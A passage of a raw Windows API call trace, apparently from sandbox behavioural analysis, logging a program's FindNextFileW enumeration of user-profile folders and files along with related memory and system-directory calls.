cAlternateFileName="IETLDC~1")) returned 1 [0158.759] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0158.759] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0158.760] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0158.760] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0158.761] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0158.761] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0158.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0158.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda4e0ba, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0158.763] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0158.763] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0158.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0158.765] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.765] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.765] CoTaskMemFree (pv=0x508980) [0158.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.766] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe7f4ba2, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.767] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd021fb60, ftLastWriteTime.dwHighDateTime=0x1cb892e, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0158.767] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.768] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe7f4ba2, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.769] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd021fb60, ftLastWriteTime.dwHighDateTime=0x1cb892e, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0158.769] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd021fb60, ftLastWriteTime.dwHighDateTime=0x1cb892e, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0158.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.770] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.770] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.770] CoTaskMemFree (pv=0x508980) [0158.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.776] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.776] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0158.776] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0158.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.777] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.778] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0158.778] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.779] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.779] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.780] CoTaskMemFree (pv=0x508980) [0158.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.781] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.781] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.783] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.783] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.784] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.784] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.784] CoTaskMemFree (pv=0x508980) [0158.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.785] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.786] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe6c3ce0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x3c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0158.786] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0158.786] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0158.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.788] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.788] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe6c3ce0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x3c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0158.788] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0158.788] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.789] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.789] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.790] CoTaskMemFree (pv=0x508980) [0158.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.790] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.791] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.792] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.792] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.793] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.793] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.793] CoTaskMemFree (pv=0x508980) [0158.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.795] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.796] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0158.796] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, 